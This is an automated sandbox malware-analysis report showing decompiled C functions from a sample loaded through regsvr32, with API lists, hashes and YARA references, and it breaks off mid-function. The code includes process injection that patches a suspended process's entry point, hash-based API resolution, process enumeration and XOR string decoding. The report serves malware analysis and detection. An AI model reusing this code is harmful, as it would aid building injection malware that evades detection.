            control_flow_graph 143 99d9de-99d9f7 call 99d309 146 99d9fd-99da0b call 99d538 143->146 147 99dad0-99dadb call 99d47c 143->147 146->147 152 99da11-99da48 call 998f63 GetThreadContext 146->152 152->147 155 99da4e-99da8e NtProtectVirtualMemory 152->155 156 99dace 155->156 157 99da90-99daab NtWriteVirtualMemory 155->157 156->147 157->156 158 99daad-99dacc NtProtectVirtualMemory 157->158 158->147 158->156
            C-Code - Quality: 100%
            			E0099D9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E0099D309(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E0099D538( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E00998F63( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E0099D47C();
				return _t66;
			}



















            0x0099d9ea
            0x0099d9ec
            0x0099d9ee
            0x0099d9f7
            0x0099da02
            0x0099da07
            0x0099da0b
            0x0099da1f
            0x0099da27
            0x0099da48
            0x0099da4e
            0x0099da56
            0x0099da64
            0x0099da6a
            0x0099da6b
            0x0099da77
            0x0099da7e
            0x0099da8e
            0x0099dace
            0x0099dace
            0x0099daad
            0x0099daad
            0x0099dacc
            0x00000000
            0x00000000
            0x0099dacc
            0x0099da8e
            0x0099da48
            0x0099da0b
            0x0099dad0
            0x0099dadb

            APIs
              • Part of subcall function 0099D309: LoadLibraryW.KERNEL32 ref: 0099D403
              • Part of subcall function 0099D538: NtCreateSection.NTDLL(0099DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0099D5AA
              • Part of subcall function 0099D538: RegisterClassExA.USER32(?), ref: 0099D5FE
              • Part of subcall function 0099D538: CreateWindowExA.USER32 ref: 0099D629
              • Part of subcall function 0099D538: DestroyWindow.USER32(00000000), ref: 0099D634
              • Part of subcall function 0099D538: UnregisterClassA.USER32 ref: 0099D63F
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
            • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0099DA40
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0099DA89
            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0099DAA6
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0099DAC7
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
            • String ID:
            • API String ID: 1578692462-0
            • Opcode ID: 9e5f3597e710433b88ea0a5f435dd26dc97998060794dcb93ce1f4b91dbbb2fe
            • Instruction ID: c4c74def684ccc4da16d018582cd3906b91093928ab971b2fd584a87e7e99ab3
            • Opcode Fuzzy Hash: 9e5f3597e710433b88ea0a5f435dd26dc97998060794dcb93ce1f4b91dbbb2fe
            • Instruction Fuzzy Hash: 2A313E72A0211AAFDB11DFA8CD85FEEBBBCEF48310F1441A6A505E2160D730EA14CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099EF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 179 99ef38-99ef4f 180 99efac 179->180 181 99ef51-99ef79 179->181 182 99efae-99efb2 180->182 181->180 183 99ef7b-99ef9e call 99a5d0 call 99e34a 181->183 188 99efa0-99efaa 183->188 189 99efb3-99efca 183->189 188->180 188->183 190 99efcc-99efd4 189->190 191 99f020-99f022 189->191 190->191 192 99efd6 190->192 191->182 193 99efd8-99efde 192->193 194 99efee-99efff 193->194 195 99efe0-99efe2 193->195 197 99f001-99f002 194->197 198 99f004-99f010 LoadLibraryA 194->198 195->194 196 99efe4-99efec 195->196 196->193 196->194 197->198 198->180 199 99f012-99f01c GetProcAddress 198->199 199->180 200 99f01e 199->200 200->182
            C-Code - Quality: 100%
            			E0099EF38(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0099E34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0099A5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























            0x0099ef41
            0x0099ef43
            0x0099ef46
            0x0099ef49
            0x0099ef4f
            0x0099efac
            0x00000000
            0x0099efac
            0x0099ef51
            0x0099ef5c
            0x0099ef5f
            0x0099ef64
            0x0099ef69
            0x0099ef6c
            0x0099ef6e
            0x0099ef71
            0x0099ef74
            0x0099ef79
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0099ef7b
            0x0099ef7b
            0x0099ef8d
            0x0099ef9a
            0x0099ef9e
            0x00000000
            0x00000000
            0x0099efa0
            0x0099efa3
            0x0099efa4
            0x0099efaa
            0x00000000
            0x00000000
            0x00000000
            0x0099efaa
            0x0099efc1
            0x0099efc6
            0x0099efca
            0x00000000
            0x0099efd6
            0x0099efd6
            0x0099efd8
            0x0099efd8
            0x0099efde
            0x00000000
            0x00000000
            0x0099efe4
            0x0099efe8
            0x0099efec
            0x00000000
            0x00000000
            0x00000000
            0x0099efec
            0x0099eff2
            0x0099effa
            0x0099efff
            0x0099f002
            0x0099f002
            0x0099f004
            0x0099f008
            0x0099f010
            0x00000000
            0x00000000
            0x0099f014
            0x0099f01c
            0x00000000
            0x00000000
            0x00000000
            0x0099f01c

            APIs
            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0099F008
            • GetProcAddress.KERNEL32(00000000,?), ref: 0099F014
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID: .dll
            • API String ID: 2574300362-2738580789
            • Opcode ID: c528729c95636f677720bd69a6c0e7fd61215b49a22cfb6ac5db217d66bfe075
            • Instruction ID: a138aabe3b16773cd8c0033dd5e2f0ae7d6b6f84f2a7e7b16a929cae675acb93
            • Opcode Fuzzy Hash: c528729c95636f677720bd69a6c0e7fd61215b49a22cfb6ac5db217d66bfe075
            • Instruction Fuzzy Hash: 9D31C431A002559BCF24CFADC880BAEBBF9AF44304F28446AE845DB351E730DD91CB94
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099BAF6 Relevance: 4.6, APIs: 3, Instructions: 66processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 221 99baf6-99bb1e CreateToolhelp32Snapshot 222 99bb8e-99bb94 221->222 223 99bb20-99bb49 call 998f63 Process32First 221->223 226 99bb59-99bb69 call 99daf2 223->226 227 99bb4b-99bb57 223->227 230 99bb6b-99bb7c 226->230 231 99bb7e-99bb8b FindCloseChangeNotification 226->231 227->222 230->226 230->231 231->222
            C-Code - Quality: 72%
            			E0099BAF6(void* __ecx, void* __edx) {
				void* _v304;
				char _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t38;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E00998F63( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						while(1) {
							_t43 = _v312( &_v308, _t33);
							if(_t43 == 0) {
								break;
							}
							_t38 =  *0x9af8d0; // 0x452f8c0
							_push( &_v308);
							_push(_t45);
							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
								continue;
							}
							break;
						}
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x9af8d0; // 0x452f8c0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}













            0x0099bb0e
            0x0099bb10
            0x0099bb14
            0x0099bb17
            0x0099bb19
            0x0099bb1e
            0x0099bb2d
            0x0099bb35
            0x0099bb49
            0x0099bb59
            0x0099bb63
            0x0099bb69
            0x00000000
            0x00000000
            0x0099bb6b
            0x0099bb75
            0x0099bb76
            0x0099bb7c
            0x00000000
            0x00000000
            0x00000000
            0x0099bb7c
            0x0099bb84
            0x0099bb8b
            0x0099bb4b
            0x0099bb4b
            0x0099bb51
            0x0099bb56
            0x0099bb56
            0x0099bb49
            0x0099bb94

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0099BB14
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
            • Process32First.KERNEL32(00000000,?), ref: 0099BB44
            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0099BB84
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32memset
            • String ID:
            • API String ID: 3344077921-0
            • Opcode ID: 230884831a946b503f5c07df6f637fb96520f2e4be4ab21bc88168929263c8f6
            • Instruction ID: 2d84e6dc8f8afef55de69e4f40708aff379b4572aeb0f5bc3528882346960fd1
            • Opcode Fuzzy Hash: 230884831a946b503f5c07df6f637fb96520f2e4be4ab21bc88168929263c8f6
            • Instruction Fuzzy Hash: 7C118E72204201ABD720EFACAC49E6A77ECEF85360F140A29F525C7194EB28D90487A2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099C778 Relevance: 6.1, APIs: 4, Instructions: 83stringCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 94%
            			E0099C778(WCHAR* __ecx, WCHAR* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				E00998F63(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x9af8d0; // 0x452f8c0
				 *((intOrPtr*)(_t23 + 0xbc))( &_v528,  &_v12);
				lstrcpynW(__edx,  &_v528, 0x100);
				_t27 = E00999F85(_t44, 0x978);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E00998D9A( &_v16);
				_t33 = E0099A5E9(_t43);
				E00999FE4( &(_t43[E0099A5E9(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0099A5E9(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0099E34A(_t43, E0099A5E9(_t43) + _t40, 0);
			}
















            0x0099c778
            0x0099c781
            0x0099c78d
            0x0099c793
            0x0099c795
            0x0099c79d
            0x0099c7ab
            0x0099c7b0
            0x0099c7bf
            0x0099c7ca
            0x0099c7d7
            0x0099c7f1
            0x0099c7f6
            0x0099c7f8
            0x0099c7ff
            0x0099c80f
            0x0099c820
            0x0099c82a
            0x0099c832
            0x0099c839
            0x0099c83c
            0x0099c859

            APIs
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
            • lstrcpynW.KERNEL32(?,?,00000100), ref: 0099C7BF
            • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0099C7F1
              • Part of subcall function 00999FE4: _vsnwprintf.MSVCRT ref: 0099A001
            • lstrcatW.KERNEL32(?,00000114), ref: 0099C82A
            • CharUpperBuffW.USER32(?,00000000), ref: 0099C83C
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
            • String ID:
            • API String ID: 455400327-0
            • Opcode ID: 4281b1d86804942503b8baa14d4e268808678270d45dfe98568d3874e181022c
            • Instruction ID: be13d77ab29925e2fddefa0b2ca7c4a5f734a62924cd13ac8bdae1c77fceae14
            • Opcode Fuzzy Hash: 4281b1d86804942503b8baa14d4e268808678270d45dfe98568d3874e181022c
            • Instruction Fuzzy Hash: E92158B2A10214BFDB10ABA8DC4AFAE77BCEFD5310F104169F505D6181EA745E0487A1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00998BCD Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 94stringCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 201 998bcd-998be2 202 998c05 201->202 203 998be4-998be7 201->203 205 998c0a-998c2a 202->205 204 998bee-998bfe 203->204 208 998c5d-998c5f 204->208 209 998c00-998c03 204->209 206 998c3a-998c3e 205->206 207 998c2c-998c31 205->207 211 998c4c-998c56 lstrlenW 206->211 212 998c40-998c4a 206->212 207->207 210 998c33-998c38 207->210 208->202 213 998c61-998c65 call 998dc9 208->213 209->202 209->204 210->206 210->212 214 998c58-998c5c 211->214 212->211 212->212 216 998c6a-998c72 213->216 217 998c7b-998c80 216->217 218 998c74-998c79 216->218 219 998c82-998c99 217->219 218->214 219->219 220 998c9b-998c9e 219->220 220->205
            C-Code - Quality: 80%
            			E00998BCD(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				short _v44;
				void* _t38;
				intOrPtr _t47;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t58;
				intOrPtr _t59;
				void* _t62;
				void* _t64;
				signed int _t71;
				signed int _t74;
				void* _t76;
				void* _t77;

				_t71 = _a12;
				_t53 = __edx;
				_v8 = __ecx;
				_t74 = _t71;
				if(_t71 >= __edx) {
					L4:
					_t54 = 0x9af94e;
					L5:
					_t58 = 0;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					asm("movsb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_t38 = 0;
					if(_v28 == 0) {
						L8:
						_t64 = _t38;
						if(_t64 == 0) {
							L10:
							lstrlenW( &_v44);
							return _t54;
						} else {
							goto L9;
						}
						do {
							L9:
							_t19 = _t58 + 0x30; // 0x30
							 *((char*)(_t77 + _t58 - 0x28)) = _t19;
							_t58 = _t58 + 1;
						} while (_t58 < _t64);
						goto L10;
					} else {
						goto L6;
					}
					do {
						L6:
						_t38 = _t38 + 1;
					} while ( *((intOrPtr*)(_t77 + _t38 - 0x18)) != 0);
					_t64 = 0xe;
					if(_t38 > _t64) {
						goto L9;
					}
					goto L8;
				}
				_t59 = _a4;
				_a12 = 0x5a;
				while( *((intOrPtr*)(_t74 % _a12 + _t59)) !=  *((intOrPtr*)(_t74 + _v8))) {
					_t74 = _t74 + 1;
					if(_t74 < _t53) {
						continue;
					}
					goto L4;
				}
				_t76 = _t74 - _t71;
				if(_t76 == 0) {
					goto L4;
				}
				_t47 = E00998DC9(_t76 + 1); // executed
				_t55 = _t47;
				_v12 = _t55;
				if(_t55 != 0) {
					_t56 = _a4;
					_t62 = _t55 - _t71;
					do {
						 *(_t62 + _t71) =  *(_t71 % _a12 + _t56) ^  *(_t71 + _v8);
						_t71 = _t71 + 1;
						_t76 = _t76 - 1;
					} while (_t76 != 0);
					_t54 = _v12;
					goto L5;
				}
				return 0x9af94e;
			}





















            0x00998bd6
            0x00998bd9
            0x00998bdb
            0x00998bde
            0x00998be2
            0x00998c05
            0x00998c05
            0x00998c0a
            0x00998c14
            0x00998c16
            0x00998c17
            0x00998c18
            0x00998c19
            0x00998c1b
            0x00998c1f
            0x00998c20
            0x00998c21
            0x00998c22
            0x00998c24
            0x00998c25
            0x00998c2a
            0x00998c3a
            0x00998c3a
            0x00998c3e
            0x00998c4c
            0x00998c50
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00998c40
            0x00998c40
            0x00998c40
            0x00998c43
            0x00998c47
            0x00998c48
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00998c2c
            0x00998c2c
            0x00998c2c
            0x00998c2d
            0x00998c35
            0x00998c38
            0x00000000
            0x00000000
            0x00000000
            0x00998c38
            0x00998be4
            0x00998be7
            0x00998bee
            0x00998c00
            0x00998c03
            0x00000000
            0x00000000
            0x00000000
            0x00998c03
            0x00998c5d
            0x00998c5f
            0x00000000
            0x00000000
            0x00998c65
            0x00998c6a
            0x00998c6c
            0x00998c72
            0x00998c7d
            0x00998c80
            0x00998c82
            0x00998c92
            0x00998c95
            0x00998c96
            0x00998c96
            0x00998c9b
            0x00000000
            0x00998c9b
            0x00000000

            APIs
            • lstrlenW.KERNEL32(?,00000138,?,009ACA88), ref: 00998C50
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: lstrlen
            • String ID: GetCurrentPath$Z
            • API String ID: 1659193697-4005238709
            • Opcode ID: 3ad7758e52b9942a3da114a08322f3da75864f25a887400351f3d6e77a8498fc
            • Instruction ID: 529b187210ebc45f3c439155cbd47d7792e0cbc9b0dcf7b6e45022eeff1fb312
            • Opcode Fuzzy Hash: 3ad7758e52b9942a3da114a08322f3da75864f25a887400351f3d6e77a8498fc
            • Instruction Fuzzy Hash: F4210431B056456FCF14CFACC8801AFBB6ABF9F310B28447CD981AB201EA309D4687E0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099C986 Relevance: 4.6, APIs: 3, Instructions: 54COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 234 99c986-99c9a6 GetTokenInformation 235 99c9a8-99c9b1 GetLastError 234->235 236 99c9ec 234->236 235->236 237 99c9b3-99c9c3 call 998dc9 235->237 238 99c9ee-99c9f2 236->238 241 99c9c9-99c9dc GetTokenInformation 237->241 242 99c9c5-99c9c7 237->242 241->236 243 99c9de-99c9ea call 998ddf 241->243 242->238 243->242
            C-Code - Quality: 86%
            			E0099C986(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00998DC9(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E00998DDF( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










            0x0099c989
            0x0099c98a
            0x0099c991
            0x0099c999
            0x0099c99d
            0x0099c9a6
            0x0099c9ec
            0x0099c9ec
            0x0099c9b3
            0x0099c9bb
            0x0099c9bd
            0x0099c9c3
            0x0099c9dc
            0x00000000
            0x0099c9de
            0x0099c9e3
            0x00000000
            0x0099c9e9
            0x0099c9c5
            0x0099c9c5
            0x0099c9c5
            0x0099c9c5
            0x0099c9c3
            0x0099c9f2

            APIs
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,00990000,00000000,00000000,?,0099CA07,00000000,00000000,?,0099CA30), ref: 0099C9A1
            • GetLastError.KERNEL32(?,0099CA07,00000000,00000000,?,0099CA30,00001644,?,0099E053), ref: 0099C9A8
              • Part of subcall function 00998DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00999793,00000100,?,0099661B), ref: 00998DD7
            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,0099CA07,00000000,00000000,?,0099CA30,00001644,?,0099E053), ref: 0099C9D7
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: InformationToken$AllocateErrorHeapLast
            • String ID:
            • API String ID: 2499131667-0
            • Opcode ID: b463c7fbb12d3fbc12775ef71f704f906061fed8a81d11afcc634249dc3e84df
            • Instruction ID: e30f77c57975d25b672e220c45c2dcbc85118bd55aa271676fa36359df2867a9
            • Opcode Fuzzy Hash: b463c7fbb12d3fbc12775ef71f704f906061fed8a81d11afcc634249dc3e84df
            • Instruction Fuzzy Hash: 8301D6B2600114BF8F205BADDC49E9B7FACDF667A17200425F405D3111EA31DD0097A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099BE10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 246 99be10-99be5f call 998f63 * 2 CreateProcessW
            C-Code - Quality: 79%
            			E0099BE10(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E00998F63(__edx, 0, 0x10);
				E00998F63( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





            0x0099be21
            0x0099be2e
            0x0099be36
            0x0099be52
            0x0099be58
            0x0099be5f

            APIs
              • Part of subcall function 00998F63: memset.MSVCRT ref: 00998F75
            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 0099BE52
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CreateProcessmemset
            • String ID: D
            • API String ID: 2296119082-2746444292
            • Opcode ID: b5b13e0e91431c864460c21901997249b5501692a1cb0338e0f93dddb560a092
            • Instruction ID: 63124b4172cb5879dace52dbe666b2a467c2fd2de2bdc0f5242ce3d77fba4a06
            • Opcode Fuzzy Hash: b5b13e0e91431c864460c21901997249b5501692a1cb0338e0f93dddb560a092
            • Instruction Fuzzy Hash: A8F037F164420C7EFA20E659CC0AFBF36ACDB81710F5001297A05E71D0E9A4AD0582A5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0099D889 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 251 99d889-99d8a9 call 99d7cd 254 99d9da-99d9dd 251->254 255 99d8af-99d8ce call 99b6e3 251->255 258 99d9ca-99d9d9 call 998ddf 255->258 259 99d8d4-99d8d6 255->259 258->254 261 99d9b8-99d9c8 call 998ddf 259->261 262 99d8dc-99d8de 259->262 261->258 263 99d8e1-99d8e3 262->263 266 99d8e9-99d908 call 998f63 call 99be10 263->266 267 99d9a6-99d9b2 263->267 273 99d96a-99d96e 266->273 274 99d90a-99d91d call 99d9de 266->274 267->259 267->261 275 99d999-99d9a0 273->275 276 99d970-99d972 273->276 274->273 281 99d91f-99d937 274->281 275->263 275->267 278 99d983-99d993 276->278 279 99d974-99d97a 276->279 278->275 279->278 284 99d939-99d94e GetLastError call 99dadc 281->284 285 99d967 281->285 288 99d950-99d95b 284->288 289 99d963-99d964 FindCloseChangeNotification 284->289 285->273 291 99d95d 288->291 292 99d95e 288->292 289->285 291->292 292->289
            C-Code - Quality: 96%
            			E0099D889(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E0099D7CD( &_v16, __edx);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x9af8d4; // 0x452fc00
				E0099B6E3( &_v80,  *((intOrPtr*)(_t38 + 0xac)) + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E00998DDF( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E00998F63( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E0099BE10( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E0099D9DE(E00996297,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x9af8d0; // 0x452f8c0
